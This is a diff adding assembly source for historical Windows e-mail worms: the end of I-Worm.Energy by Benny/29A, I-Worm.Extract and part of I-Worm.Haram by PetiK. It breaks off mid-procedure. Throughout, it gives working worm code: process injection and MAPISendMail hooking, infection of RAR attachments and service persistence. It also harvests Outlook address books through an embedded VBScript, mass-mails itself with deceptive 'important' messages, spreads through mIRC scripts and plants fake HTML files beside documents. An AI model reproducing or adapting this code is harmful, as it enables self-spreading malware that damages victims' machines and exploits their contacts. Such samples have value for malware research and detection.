very small worm, spreading via +RAR filez. it can parse all processes, hook there MAPISendMail API procedure +and infect all attached RAR filez in a message by dropping itself to there. +very similar technique of the process'es address space manipulationz is +described in my article "Multi-process residency" and Win32.HIV virus. surely +it can't work on Win95/98 systemz. it worx on Windows 2000 OS, and (perhaps) +also on earlier versionz of Windows NT - but I don't know, I haven't tested it. + +it can stay resident in memory as a service, by standard API callz, valid only +in NT systemz. while infecting the RAR archivez it addz itself to there under +the "SETUP.EXE" filename, containing also the standard setup icon. I tried to +optimize the source a bit... I know the worm is not super-small, but I it is +resident heavilly armoured very effective tiny mail-spreading worm. + + +the scheme of execution: + + +after execution: +- anti-* stuff +- if initialized by SCM, run as a service process +- copy worm to system directory as "ENERGY.EXE" +- register worm as service process and run it everytime the OS will start +- enum processes, find MAPI32.dll there and hook MAPSendMail (using many + trics) +- wait one minute and again + +hook_procedure: +- parse embedded filez and search for RAR filez. +- infect them by worm file: SETUP.EXE, mark as read-only (already-infected + mark). + + +the worm is encrypted/compressed by "tElock, version 0.51", one very nice +utility for armouring executable filez. this protector containz many nice +anti-* featurez. that's why I decided to use it. and also becoz I think guyz at +AVP can't handle this one. + +it is possible that worm containz some bugz. yeah, but I don't care... I'm glad +I was able to finish it in 2 dayz and that it was not b0ring. I had a fun. + + + +If you would like to consult anything with me, feel free to contact me... + + + +(c) 14th November 2000 Ŀ +Czech Republic Benny / 29A Ŀ + @ benny_29a@privacyx.com + @ http://benny29a.cjb.net + +# + + +.586p +.model flat ;blablabla + +extrn GetLastError:PROC ;needed APIz +extrn EnumProcesses:PROC +extrn OpenProcess:PROC +extrn VirtualProtect:PROC +extrn VirtualAllocEx:PROC +extrn VirtualFreeEx:PROC +extrn CloseHandle:PROC +extrn CreateRemoteThread:PROC +extrn WriteProcessMemory:PROC +extrn Sleep:PROC +extrn WaitForSingleObject:PROC +extrn GetModuleHandleA:PROC +extrn GetProcAddress:PROC +extrn CreateFileA:PROC +extrn WriteFile:PROC +extrn GetModuleFileNameA:PROC +extrn GetFileSize:PROC +extrn ReadFile:PROC +extrn VirtualFree:PROC +extrn VirtualAlloc:PROC +extrn SetFilePointer:PROC +extrn SetFileAttributesA:PROC +extrn OpenMutexA:PROC +extrn ExitThread:PROC +extrn GetSystemDirectoryA:PROC +extrn CopyFileA:PROC + + +;extrn OpenServiceA:PROC +;extrn DeleteService:PROC ;***debug only! +extrn OpenSCManagerA:PROC +extrn CreateServiceA:PROC +extrn CloseServiceHandle:PROC +extrn StartServiceCtrlDispatcherA:PROC +extrn RegisterServiceCtrlHandlerA:PROC +extrn SetServiceStatus:PROC + + +include useful.inc ;include filez +include win32api.inc + + +PROC_COUNT equ 40*4 ;number of processes + + +.data + db ? ;some data + +.code +Start: ;worm code starts here + pushad + @SEH_SetupFrame ;setup SEH frame + +e_name: @pushsz 'EnErGy' + push 0 + push 1 + call OpenMutexA ;check if mutex is + test eax,eax ;created, if not, + je end_seh ;we are prob. debugged + push eax + call CloseHandle ;close its handle + + jmp SVCRegister ;logging as a service + +e_svc: push 256 + mov esi, offset worm_name + push esi + push 0 + call GetModuleFileNameA ;get path+filename of + ;the worm + mov edi,offset sys_dir + push edi + push 256 + push edi + call GetSystemDirectoryA ;get windowz system dir. + add edi,eax + mov al,'\' + stosb + mov eax,'rene' + stosd + mov eax,'e.yg' + stosd + mov eax,'ex' + stosd ;construct path+filename + + pop edi + push 0 + push edi + push esi + call CopyFileA ;copy worm to sys. dir. + + call SVCCreate ;register as a service + + push api_num + pop ecx + call @api_table + dd offset GetModuleHandleA ;adressez of APIz + dd offset GetProcAddress + dd offset VirtualProtect + dd offset CreateFileA + dd offset CloseHandle + dd offset WriteFile + dd offset GetFileSize + dd offset ReadFile + dd offset VirtualFree + dd offset VirtualAlloc + dd offset SetFilePointer + dd offset SetFileAttributesA +api_num = 12 +@api_table: + pop ebx + + call @api_dest ;addressez of variablez + dd offset _gmha ;that will hold APIz + dd offset _gpa + dd offset _vp + dd offset _cfa + dd offset _ch + dd offset _wf + dd offset _gfs + dd offset _rf + dd offset _vf + dd offset _va + dd offset _sfp + dd offset _sfaa +@api_dest: + pop esi + +get_apiz: + dec ecx ;decrement counter + mov eax,[ebx+ecx*4] + mov eax,[eax+2] + mov eax,[eax] + mov edx,[esi+ecx*4] + mov [edx],eax ;store API address + test ecx,ecx + jne get_apiz + +worm_loop: + mov ebx,offset tmp + push ebx + push PROC_COUNT + mov esi,offset proc_dump + push esi + call EnumProcesses ;enum all processez + dec eax + jne end_seh + + mov ecx,[ebx] ;try this PID +p_check:lodsd + call proc_infect ;try to infect it + add ecx,-3 + loop p_check ;try next PID + +worm_wait: + push 60000 + call Sleep ;wait one minute + jmp worm_loop ;and try again. + + +;infect processez +proc_infect Proc + pushad + push eax + push 0 + push 2 or 8 or 10h or 20h or 400h + call OpenProcess ;get handle to process + xchg eax,ecx + jecxz end_proc_infect + mov ebx,ecx + + push PAGE_READWRITE + push MEM_RESERVE or MEM_COMMIT + push virtual_end-Start + push 0 + push ebx + call VirtualAllocEx ;allocate there memory + xchg eax,ecx ;for worm + jecxz end_proc_infect2 + mov esi,ecx + + push 0 + push virtual_end-Start + push offset Start + push esi + push ebx + call WriteProcessMemory ;copy there worm body + dec eax + jne end_proc_infect3 + + lea edx,[esi+offset ThreadEntry-offset Start] + push eax + push eax + push eax + push edx + push eax + push eax + push ebx + call CreateRemoteThread ;create thread there + xchg eax,ecx + jecxz end_proc_infect3 + push ecx + + push -1 + push ecx + call WaitForSingleObject ;wait for its termination + call CloseHandle ;and close its handle + jmp end_proc_infect2 ;and quit + +end_proc_infect3: + push MEM_RELEASE + push 0 + push esi + push ebx + call VirtualFreeEx ;release memory if failed + +end_proc_infect2: + push ebx + call CloseHandle ;close handle to process +end_proc_infect: + popad + ret ;and quit +proc_infect EndP + + +;remote thread procedure +ThreadEntry Proc + pushad + @SEH_SetupFrame ;setup SEH frame + call gdelta +gdelta: pop ebp ;get delta offset + + @pushsz 'MAPI32.dll' + mov eax,12345678h +_gmha = dword ptr $-4 + call eax ;get address of MAPI32.dll + xchg eax,ecx + jecxz end_seh ;quit if not loaded + + @pushsz 'MAPISendMail' + push ecx + mov eax,12345678h +_gpa = dword ptr $-4 + call eax ;get address of + xchg eax,ecx ;MAPISendMail API + jecxz end_seh + mov esi,ecx ;to ESI + + lea eax,[ebp + tmp - gdelta] + push eax + push PAGE_READWRITE + push 5 + push esi + mov eax,12345678h +_vp = dword ptr $-4 + call eax ;release page protection + xchg eax,ecx + jecxz end_seh + + call hook_api ;hook the API + +end_seh:@SEH_RemoveFrame ;remove SEH frame + popad ;and quit + ret + +;proc for API hooking +hook_api: + mov [ebp + old_MAPI_addr - gdelta],esi + push esi + lea edi,[ebp + old_MAPI_api - gdelta] + movsd + movsb ;save first bytez of API + pop edi + mov ebx,edi + + lea eax,[ebp + MAPI_hooker - gdelta] + sub ebx,eax + neg ebx + add ebx,-5 + mov al,0E9h + stosb + xchg eax,ebx + stosd ;overwrite by JMP + ret + +;the API hooker +MAPI_hooker: + push 12345678h +old_MAPI_addr = dword ptr $-4 ;save the address of API + + pushad + mov edi,[esp.cPushad] ;get ptr to message + @SEH_SetupFrame ;setup SEH frame + push edi + + mov ebx,[esp.cPushad.28] + mov ecx,[ebx+40] ;number of attachmentz + mov ebx,[ebx+44] ;ptr to file fieldz + +f_parse:mov esi,[ebx+12] + lea edi,[ebp + arc_buffer - gdelta] + push edi + @copysz + dec edi + cmp byte ptr [edi-1],'\' + je over_slash + mov al,'\' + stosb +over_slash: + mov esi,[ebx+16] + @copysz + or [esi-5],20202020h ;lower case + cmp [esi-5],'rar.' + pop esi ;create path+filename + jne o_r ;quit if not RAR file + call infect_archive ;try to infect this file +o_r: sub ebx,-24 + loop f_parse ;try another file in msg + + pop edi + call @m_res + old_MAPI_api db 5 dup (90h) +@m_res: pop esi + movsd + movsb ;remove the API hooker + jmp end_seh ;and quit + + +;procedure for RAR archive infecting +infect_archive: + pushad + @SEH_SetupFrame ;setup SEH frame + call gd +gd: pop ebp ;get delta offset + + lea eax,[ebp + worm_name - gd] ;get worm filename + push 0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push 0 + push 0 + push GENERIC_READ + push eax + call [ebp + _cfa - gd] ;open worm file + inc eax + je end_seh + dec eax + mov [ebp + hFile - gd],eax ;save handle + + push 0 + push eax + mov eax,12345678h +_gfs = dword ptr $-4 + call eax ;get its size + push eax + + push PAGE_READWRITE + push MEM_RESERVE or MEM_COMMIT + push eax + push 0 + mov eax,12345678h +_va = dword ptr $-4 + call eax ;allocate enough memory + test eax,eax + pop edx + je end_file + xchg eax,ebx + + push edx + push 0 + lea eax,[ebp + tmp - gd] + push eax + push edx + push ebx + push dword ptr [ebp + hFile - gd] + mov eax,12345678h +_rf = dword ptr $-4 ;and copy there worm + call eax + call close_file ;close handle to file + pop edi + + pushad + mov esi,ebx + call CRC32 ;calculate CRC32 of + mov [ebp + RARCRC32 - gd],eax ;the worm file + popad + + push 0 + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push 0 + push 0 + push GENERIC_READ or GENERIC_WRITE + push esi + mov eax,12345678h +_cfa = dword ptr $-4 + call eax ;open the archive + inc eax + je end_file2 + dec eax + mov [ebp + hFile - gd],eax ;save its handle + + push 2 + push 0 + push 0 + push eax + mov eax,12345678h +_sfp = dword ptr $-4 + call eax ;go to EOF + + pushad + lea esi,[ebp + RARHeaderCRC+2 - gd] + push end_RAR-RARHeader-2 + pop edi + call CRC32 ;calculate CRC32 of + mov [ebp + RARHeaderCRC - gd],ax ;the RAR file header + popad ;and save it + + push 0 + lea eax,[ebp + tmp - gd] + push eax + push end_RAR-RARHeader + call end_RAR +RARHeader: ;No comment ;) +RARHeaderCRC dw 0 +RARType db 74h +RARFlags dw 8000h +RARHSize dw end_RAR-RARHeader +RARCompressed dd 2000h +RAROriginal dd 2000h +RAROS db 0 +RARCRC32 dd 0 +RARFileDateTime dd 12345678h +RARNeedVer db 14h +RARMethod db 30h +RARFNameSize dw end_RAR-RARName +RARAttrib dd 0 +RARName db 'SETUP.EXE' +end_RAR: + push dword ptr [ebp + hFile - gd] + mov eax,12345678h +_wf = dword ptr $-4 + call eax ;write RAR file header + + push 0 + lea eax,[ebp + tmp - gd] + push eax + push edi + push ebx + push dword ptr [ebp + hFile - gd] + call [ebp + _wf - gd] ;write the worm + +end_file2: + push MEM_RELEASE + push 0 + push ebx + mov eax,12345678h +_vf = dword ptr $-4 + call eax ;release the memory +end_file: + call close_file ;close the archive + + push FILE_ATTRIBUTE_READONLY + push esi + mov eax,12345678h +_sfaa = dword ptr $-4 + call eax ;set READ-ONLY attribute + jmp end_seh ;and quit + +close_file: + push 12345678h ;handle... +hFile = dword ptr $-4 + mov eax,12345678h +_ch = dword ptr $-4 + call eax ;close file handle + ret + +CRC32 Proc + push ecx ;procedure for + push edx ;calculating CRC32s + push ebx ;at run-time + xor ecx,ecx + dec ecx + mov edx,ecx +NextByteCRC: + xor eax,eax + xor ebx,ebx + lodsb + xor al,cl + mov cl,ch + mov ch,dl + mov dl,dh + mov dh,8 +NextBitCRC: + shr bx,1 + rcr ax,1 + jnc NoCRC + xor ax,08320h + xor bx,0EDB8h +NoCRC: dec dh + jnz NextBitCRC + xor ecx,eax + xor edx,ebx + dec edi + jne NextByteCRC + not edx + not ecx + pop ebx + mov eax,edx + rol eax,16 + mov ax,cx + pop edx + pop ecx +SVCHandler: + ret +CRC32 EndP +ThreadEntry EndP + + +;log on to SCM +SVCRegister Proc + call _dt + dd offset e_name+5 + dd offset service_start + dd 0 + dd 0 +_dt: call StartServiceCtrlDispatcherA ;start service dispatcher + dec eax + jne e_svc ;quit if error (no service + ;requestz) + push 0 + call ExitThread ;terminate this thread + +service_start: ;execution goes here... + pushad + @SEH_SetupFrame ;setup SEH frame + + push offset SVCHandler + push offset e_name+5 + call RegisterServiceCtrlHandlerA ;register service control + test eax,eax ;handler + je e_svc ;quit if error + push eax + + call _ss +ss_: dd 10h or 20h + dd 4 + dd 0 + dd 0 + dd 0 + dd 0 + dd 0 +_ss: push eax + call SetServiceStatus ;set service status + call CloseServiceHandle ;close service handle + jmp e_svc ;and quit +SVCRegister EndP + + +;create item at SCM +SVCCreate Proc + push 000F0000h or 2 + push 0 + push 0 + call OpenSCManagerA ;get handle to SCM + test eax,eax + je e_scm0 + xchg eax,esi + +; push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h +; push offset e_name+5 +; push esi +; call OpenServiceA ;*** debug! +; +; push eax +; push eax +; call DeleteService ;*** debug! +; call CloseServiceHandle ;*** debug! + + xor eax,eax + push eax + push eax + push eax + push eax + push eax + push offset sys_dir + push eax + push 2 + push 10h + push 000F0000h or 1 or 2 or 4 or 8 or 10h or 20h or 40h or 80h or 100h + push offset e_name+5 + push dword ptr [esp] + push esi + call CreateServiceA ;create service item + test eax,eax ;at SCM + je e_scm1 ;quit if error + + push eax + call CloseServiceHandle ;close service handlez +e_scm1: push esi + call CloseServiceHandle ;... +e_scm0: ret ;and quit +SVCCreate EndP + + +signature db 0,'[I-Worm.Energy] by Benny/29A',0 + ;signature + proc_dump db PROC_COUNT dup (?) ;buffer for PIDz + worm_name db 256 dup (?) ;buffer for filename + tmp dd ? ;temporary variable + sys_dir db 256 dup (?) ;buffer for system dir. + arc_buffer db 256 dup (?) ;buffer for archive + ;filename +virtual_end: ;...end of virus. +ends +end Start ;. + + +;bonus: +;here are lyrics from "Imagine", one very nice song from John Lennon. + +; Imagine there's no heaven, +; It's easy if you try, +; No hell below us, +; Above us only sky, +; Imagine all the people +; living for today... +; +; Imagine there's no countries, +; It isn't hard to do, +; Nothing to kill or die for, +; No religion too, +; Imagine all the people +; living life in peace... +; +; You may say I'm a dreamer, +; but I'm not the only one, +; I hope some day you'll join us, +; And the world will live as one. +; +; Imagine no possesions, +; I wonder if you can, +; No need for greed or hunger, +; A brotherhood of man, +; Imagine all the people +; Sharing all the world... +; +; You may say I'm a dreamer, +; but I'm not the only one, +; I hope some day you'll join us, +; And the world will live as one. diff --git a/Win32/I-Worm.Extract.asm b/Win32/I-Worm.Extract.asm new file mode 100644 index 00000000..81702ef7 --- /dev/null +++ b/Win32/I-Worm.Extract.asm @@ -0,0 +1,480 @@ +comment # +Name : I-Worm.Extract +Author : PetiK +Date : February 3rd 2002 - February 4th 2002 +Size : 5632 + +Action : +# + +.586p +.model flat +.code + +JUMPS + +api macro a +extrn a:proc +call a +endm + +include Useful.inc +include myinclude.inc + +start_worm: + @pushsz "KERNEL32.DLL" + api GetModuleHandleA + xchg eax,ebx + +kern macro x + push offset sz&x + push ebx + api GetProcAddress + mov _ptk&x,eax + endm + + kern CloseHandle + kern CopyFileA + kern CreateDirectoryA + kern CreateFileA + kern CreateFileMappingA + kern DeleteFileA + kern GetDateFormatA + kern GetFileSize + kern GetModuleFileNameA + kern GetSystemDirectoryA + kern GetSystemTime + kern GetTimeFormatA + kern GetWindowsDirectoryA + kern lstrcat + kern lstrcmp + kern lstrcpy + kern lstrlen + kern MapViewOfFile + kern SetCurrentDirectoryA + kern Sleep + kern UnmapViewOfFile + kern WinExec + kern WriteFile + kern WriteProfileStringA + kern WritePrivateProfileStringA + + + push 50 + mov esi,offset orig_worm + push esi + push 0 + call _ptkGetModuleFileNameA + + push 50 + push offset verif_worm + call _ptkGetSystemDirectoryA + @pushsz "\UPDATEW32.EXE" + push offset verif_worm + call _ptklstrcat + + push esi + push offset verif_worm + call _ptklstrcmp + test eax,eax + jz continue_worm + + mov edi,offset copy_worm + push edi + push 50 + push edi + call _ptkGetSystemDirectoryA + add edi,eax + mov eax,"dpU\" + stosd + mov eax,"Weta" + stosd + mov eax,"e.23" + stosd + mov eax,"ex" + stosd + pop edi + +copy_w: push 0 + push edi + push esi + call _ptkCopyFileA + +run_w: push edi + @pushsz "RUN" + @pushsz "WINDOWS" + call _ptkWriteProfileStringA + + call CreateDate + push 50 + push offset realname + push offset orig_worm + api GetFileTitleA + + @pushsz " - " + push offset date + call _ptklstrcat + push offset realname + push offset date + call _ptklstrcat + +f_mess: push 10h + push offset date + call @mess + db "Cannot Open this File !",CRLF,CRLF + db "If you downloaded this file, try downloading again.",0 + @mess: + push 0 + api MessageBoxA + jmp end_worm + +continue_worm: + push 50 + push offset vbsfile + call _ptkGetWindowsDirectoryA + @pushsz "\ExtractVbs.vbs" + push offset vbsfile + call _ptklstrcat + + push 0 + push 20h + push 2 + push 0 + push 1 + push 40000000h + push offset vbsfile + call _ptkCreateFileA + xchg eax,ebx + push 0 + push offset octets + push e_vbs - s_vbs + push offset s_vbs + push ebx + call _ptkWriteFile + push ebx + call _ptkCloseHandle + + push offset vbsfile + push offset vbsexec + call _ptklstrcpy + push 4 + push offset execcontrol + call _ptkWinExec + push 5000 + call _ptkSleep + push offset vbsfile + call _ptkDeleteFileA + +payload: + push offset Systime + call _ptkGetSystemTime + cmp [Systime.wDay],29 + jne end_pay + push 40h + @pushsz "I-Worm.Extract" + call e_mess + db "Hi man, you received my worm !",CRLF + db "Don't panic, it doesn't format your computer",CRLF,CRLF + db 9,"Bye and Have a Nice Day.",0 + e_mess: + push 0 + api MessageBoxA +end_pay: + +sh_gsf: push 0 + push 5 + push offset progra + push 0 + api SHGetSpecialFolderPathA + push offset progra + call _ptkSetCurrentDirectoryA + @pushsz "Update Windows 32bits" + call _ptkCreateDirectoryA + @pushsz "\Update Windows 32bits" + push offset progra + call _ptklstrcat + push offset progra + call _ptkSetCurrentDirectoryA + push 0 + @pushsz "MAJ.exe" + push offset orig_worm + call _ptkCopyFileA + +verif_inet: + push 0 + push offset inet + api InternetGetConnectedState + dec eax + jnz verif_inet + + push 50 + push offset winpath + call _ptkGetWindowsDirectoryA + push offset winpath + call _ptkSetCurrentDirectoryA + +spread: pushad + push 00h + push 80h + push 03h + push 00h + push 01h + push 80000000h + @pushsz "Outlook_Addr.txt" + call _ptkCreateFileA + inc eax + je end_spread + dec eax + xchg eax,ebx + + xor eax,eax + push eax + push eax + push eax + push 2 + push eax + push ebx + call _ptkCreateFileMappingA + test eax,eax + je end_s1 + xchg eax,ebp + + xor eax,eax + push eax + push eax + push eax + push 4 + push ebp + call _ptkMapViewOfFile + test eax,eax + je end_s2 + xchg eax,esi + + push 0 + push ebx + call _ptkGetFileSize + cmp eax,4 + jbe end_s3 + +scan_mail: + xor edx,edx + mov edi,offset mail_addr + push edi + p_c: lodsb + cmp al," " + je car_s + cmp al,";" + je end_m + cmp al,"#" + je f_mail + cmp al,'@' + jne not_a + inc edx + not_a: stosb + jmp p_c + car_s: inc esi + jmp p_c + end_m: xor al,al + stosb + pop edi + test edx,edx + je scan_mail + call send_mail + jmp scan_mail + f_mail: + +end_s3: push esi + call _ptkUnmapViewOfFile +end_s2: push ebp + call _ptkCloseHandle +end_s1: push ebx + call _ptkCloseHandle +end_spread: popad + +end_worm: + push 0 + api ExitProcess + +send_mail: + call CreateDate + call CreateTime + @pushsz "C:\liste.ini" + push offset mail_addr + push offset time + push offset date + call _ptkWritePrivateProfileStringA + + xor eax,eax + push eax + push eax + push offset Message + push eax + push [sess] + api MAPISendMail + ret + +CreateDate Proc + pushad + mov edi,offset date + push 32 + push edi + @pushsz "dddd, dd MMMM yyyy" + push 0 + push 0 + push 9 + call _ptkGetDateFormatA + popad + ret +CreateDate EndP +CreateTime Proc + pushad + mov edi,offset time + push 32 + push edi + @pushsz "HH:mm:ss" + push 0 + push 0 + push 9 + call _ptkGetTimeFormatA + popad + ret +CreateTime EndP + + +.data +copy_worm db 50 dup (0) +orig_worm db 50 dup (0) +verif_worm db 50 dup (0) +vbsfile db 50 dup (0) +winpath db 50 dup (0) +progra db 50 dup (0) +mail_addr db 128 dup (?) +realname db 50 dup (0) +date db 30 dup (?) +time db 9 dup (?) +octets dd ? +inet dd 0 +sess dd 0 + +subject db "Re: Check This...",0 +body db "Hi",CRLF + db "This is the file you ask for. Open quickly ! It's very important",CRLF,CRLF + db 9,"Best Regards",CRLF,CRLF,CRLF + db "Salut,",CRLF + db "Voici le fichier que tu cherches. Ouvre vite ! C'est trs important",CRLF,CRLF + db 9,"Mes sincres salutations",0 +filename db "important.exe",0 + +Message dd ? + dd offset subject + dd offset body + dd ? + dd ? + dd ? + dd 2 + dd offset MsgFrom + dd 1 + dd offset MsgTo + dd 1 + dd offset Attach + +MsgFrom dd ? + dd ? + dd ? + dd ? + dd ? + dd ? + +MsgTo dd ? + dd 1 + dd offset mail_addr + dd offset mail_addr + dd ? + dd ? + +Attach dd ? + dd ? + dd ? + dd offset orig_worm + dd offset filename + dd ? + +szCloseHandle db "CloseHandle",0 +szCopyFileA db "CopyFileA",0 +szCreateDirectoryA db "CreateDirectoryA",0 +szCreateFileA db "CreateFileA",0 +szCreateFileMappingA db "CreateFileMappingA",0 +szDeleteFileA db "DeleteFileA",0 +szGetDateFormatA db "GetDateFormatA",0 +szGetFileSize db "GetFileSize",0 +szGetModuleFileNameA db "GetModuleFileNameA",0 +szGetSystemDirectoryA db "GetSystemDirectoryA",0 +szGetSystemTime db "GetSystemTime",0 +szGetTimeFormatA db "GetTimeFormatA",0 +szGetWindowsDirectoryA db "GetWindowsDirectoryA",0 +szlstrcat db "lstrcat",0 +szlstrcmp db "lstrcmp",0 +szlstrcpy db "lstrcpy",0 +szlstrlen db "lstrlen",0 +szMapViewOfFile db "MapViewOfFile",0 +szSetCurrentDirectoryA db "SetCurrentDirectoryA",0 +szSleep db "Sleep",0 +szUnmapViewOfFile db "UnmapViewOfFile",0 +szWinExec db "WinExec",0 +szWriteFile db "WriteFile",0 +szWritePrivateProfileStringA db "WritePrivateProfileStringA",0 +szWriteProfileStringA db "WriteProfileStringA",0 + +_ptkCloseHandle dd ? +_ptkCopyFileA dd ? +_ptkCreateDirectoryA dd ? +_ptkCreateFileA dd ? +_ptkCreateFileMappingA dd ? +_ptkDeleteFileA dd ? +_ptkGetDateFormatA dd ? +_ptkGetFileSize dd ? +_ptkGetModuleFileNameA dd ? +_ptkGetSystemDirectoryA dd ? +_ptkGetSystemTime dd ? +_ptkGetTimeFormatA dd ? +_ptkGetWindowsDirectoryA dd ? +_ptklstrcat dd ? +_ptklstrcmp dd ? +_ptklstrcpy dd ? +_ptklstrlen dd ? +_ptkMapViewOfFile dd ? +_ptkSetCurrentDirectoryA dd ? +_ptkSleep dd ? +_ptkUnmapViewOfFile dd ? +_ptkWinExec dd ? +_ptkWriteFile dd ? +_ptkWriteProfileStringA dd ? +_ptkWritePrivateProfileStringA dd ? + +s_vbs: db 'On Error Resume Next',CRLF + db 'Set f=CreateObject("Scripting.FileSystemObject")',CRLF + db 'Set win=f.GetSpecialFolder(0)',CRLF + db 'Set c=f.CreateTextFile(win&"\Outlook_Addr.txt")',CRLF + db 'c.Close',CRLF + db 'Set out=CreateObject("Outlook.Application")',CRLF + db 'Set mapi=out.GetNameSpace("MAPI")',CRLF + db 'adr="extractcounter@multimania.com"',CRLF + db 'For Each mail in mapi.AddressLists',CRLF + db 'If mail.AddressEntries.Count <> 0 Then',CRLF + db 'For O=1 To mail.AddressEntries.Count',CRLF + db 'adr=adr &";"& mail.AddressEntries(O).Address',CRLF + db 'Next',CRLF + db 'End If',CRLF + db 'Next',CRLF + db 'adr=adr &";#"',CRLF,CRLF + db 'Set c=f.OpenTextFile(win&"\Outlook_Addr.txt",2)',CRLF + db 'c.WriteLine adr',CRLF + db 'c.Close',CRLF +e_vbs: + +execcontrol db "wscript " + vbsexec db 50 dup (0) + db "",0 + +end start_worm +end \ No newline at end of file diff --git a/Win32/I-Worm.Haram.asm b/Win32/I-Worm.Haram.asm new file mode 100644 index 00000000..1d2f3fec --- /dev/null +++ b/Win32/I-Worm.Haram.asm @@ -0,0 +1,592 @@ +comment * +Name : I-Worm.Haram +Author : PetiK + +Language : win32asm +Date : May 13th 2002 - June 1st 2002 + +Size : 5192 bytes (compressed with Petite Tool) + +Comments : - Copy to %sysdir%\FunnyGame.exe + - Search all doc files in "Personal" folder and create a new virus html file: + + example : document.doc -> document.htm + 1) 2) + + 1) Good DOC file + 2) Good HTM virus (1571 bytes) + + - Put the name of all active process and add .htm: + + example : process.exe -> process.exe.htm + 3) 4) + + 3) Real name of active process + 4) Real name of the HTM virus (in "C:\backup" folder for Win ME/2k/XP) + + - Create a random name file in StarUp folder to spread with Outlook + + - On the 10th, payload : open and close CD door and display a messagebox in loop + +* + +.586p +.model flat +.code + +JUMPS + +include win32api.inc + +LF equ 10 +CR equ 13 +CRLF equ <13,10> + +@pushsz macro msg2psh, empty + local next_instr + ifnb + %out too much arguments in macro '@pushsz' + .err + endif + call next_instr + db msg2psh,0 + next_instr: +endm + +@endsz macro + local nxtchr + nxtchr: lodsb + test al,al + jnz nxtchr +endm + +api macro a + extrn a:proc + call a +endm + +WIN32_FIND_DATA struct +dwFileAttributes dd 0 +ftCreationTime dd ?,? +ftLastAccessTime dd ?,? +ftLastWriteTime dd ?,? +nFileSizeHigh dd 0 +nFileSizeLow dd 0 +dwReserved0 dd 0,0 +cFileName db 260 dup(0) +cAlternateFileName db 14 dup(0) + db 2 dup (0) +WIN32_FIND_DATA ends + +PROCESSENTRY32 STRUCT + dwSize DWORD ? + cntUsage DWORD ? + th32ProcessID DWORD ? + th32DefaultHeapID DWORD ? + th32ModuleID DWORD ? + cntThreads DWORD ? + th32ParentProcessID DWORD ? + pcPriClassBase DWORD ? + dwFlags DWORD ? + szExeFile db 260 dup(?) +PROCESSENTRY32 ENDS + +start: pushad + @SEH_SetupFrame + +hide_the_worm: + call hide_worm + +get_name: + push 50 + mov esi,offset orgwrm + push esi + push 0 + api GetModuleFileNameA + +get_copy_name: + mov edi,offset cpywrm + push edi + push 50 + push edi + api GetSystemDirectoryA + add edi,eax + mov eax,'nuF\' + stosd + mov eax,'aGyn' + stosd + mov eax,'e.em' + stosd + mov eax,'ex' + stosd + pop edi + +copy_worm: + push 1 + push edi + push esi + api CopyFileA + test eax,eax + je ok_copy + + push 50 + push edi + push 1 + @pushsz "Haram" + @pushsz "Software\Microsoft\Windows\CurrentVersion\Run" + push 80000002h + api SHSetValueA + + push 50 + push offset msgwrm + push esi + api GetFileTitleA + push 10h + push offset msgwrm + @pushsz "ERROR : this file is not a valid Win32 file." + push 0 + api MessageBoxA +ok_copy: + +call inf_doc_personal + +get_startup_path: + push 0 + push 7 + push offset startup + push 0 + api SHGetSpecialFolderPathA + push offset startup + api SetCurrentDirectoryA + +call cr_vbsname + + mov edi,offset vbsname + + push 0 + push 1 + push 2 + push 0 + push 1 + push 40000000h + push edi + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + push e_vbs - s_vbs + push offset s_vbs + push ebp + api WriteFile + push ebp + api CloseHandle + + +payload: + mov eax,offset sysTime + push eax + api GetSystemTime + lea eax,sysTime + cmp word ptr [eax+6],10 + jne end_payload + + xor eax,eax + push eax + push eax + push eax + @pushsz "set CDAudio door open" + api mciSendStringA + + push 500 + api Sleep + + xor eax,eax + push eax + push eax + push eax + @pushsz "set CDAudio door closed" + api mciSendStringA + + push 40h + @pushsz "I-Worm.Haram" + @pushsz "Coded by PetiK - 2002 - France" + push 0 + api MessageBoxA + + api GetTickCount + push 10000 + pop ecx + xor edx,edx + div ecx + inc edx + mov ecx,edx + push ecx + api Sleep + jmp payload + +end_payload: + +call inf_process + +end_worm: + @SEH_RemoveFrame + popad + push 0 + api ExitProcess + +hide_worm Proc + pushad + @pushsz "KERNEL32.DLL" + api GetModuleHandleA + xchg eax,ecx + jecxz end_hide_worm + @pushsz "RegisterServiceProcess" ; Registered as Service Process + push ecx + api GetProcAddress + xchg eax,ecx + jecxz end_hide_worm + push 1 + push 0 + call ecx + end_hide_worm: + popad + ret +hide_worm EndP + +Spread_Mirc Proc + push offset cpywrm + push offset mirc_exe + api lstrcpy + call @mirc + db "C:\mirc\script.ini",0 + db "C:\mirc32\script.ini",0 ; spread with mIRC. Thanx to Microsoft. + db "C:\progra~1\mirc\script.ini",0 + db "C:\progra~1\mirc32\script.ini",0 + @mirc: + pop esi + push 4 + pop ecx + mirc_loop: + push ecx + push 0 + push 80h + push 2 + push 0 + push 1 + push 40000000h + push esi + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + @tmp_mirc: + push e_mirc - s_mirc + push offset s_mirc + push ebp + api WriteFile + push ebp + api CloseHandle + @endsz + pop ecx + loop mirc_loop + end_spread_mirc: + ret +Spread_Mirc EndP + + + +inf_doc_personal Proc + pushad +get_personal_folder: + push 0 + push 5 + push offset personal + push 0 + api SHGetSpecialFolderPathA + push offset personal + api SetCurrentDirectoryA +fff_doc: + push offset ffile + @pushsz "*.doc" + api FindFirstFileA + inc eax + je end_f_doc + dec eax + mov [hfind],eax + +cr_file: + push offset ffile.cFileName + push offset new_file + api lstrcpy + mov esi,offset new_file + push esi + api lstrlen + add esi,eax + sub esi,4 ; to become \SYSTEM\Wsock32 + mov [esi],"mth." + lodsd + + push 0 + push 1 + push 2 + push 0 + push 1 + push 40000000h + push offset new_file + api CreateFileA + mov ebp,eax + push 0 + push offset byte_write + push e_htm - s_htm + push offset s_htm + push ebp + api WriteFile + push ebp + api CloseHandle + +fnf_doc: + push offset ffile + push [hfind] + api FindNextFileA + test eax,eax + jne cr_file + push [hfind] + api FindClose +end_f_doc: + popad + ret +inf_doc_personal EndP + + +inf_process Proc + popad +create_folder: + push 0 + @pushsz "C:\backup" + api CreateDirectoryA + @pushsz "C:\backup" + api SetCurrentDirectoryA +enum_process: + push 0 + push 2 + api CreateToolhelp32Snapshot + mov lSnapshot,eax + inc eax + je end_inf_process + lea eax,uProcess + mov [eax.dwSize], SIZE PROCESSENTRY32 + lea eax,uProcess + push eax + push 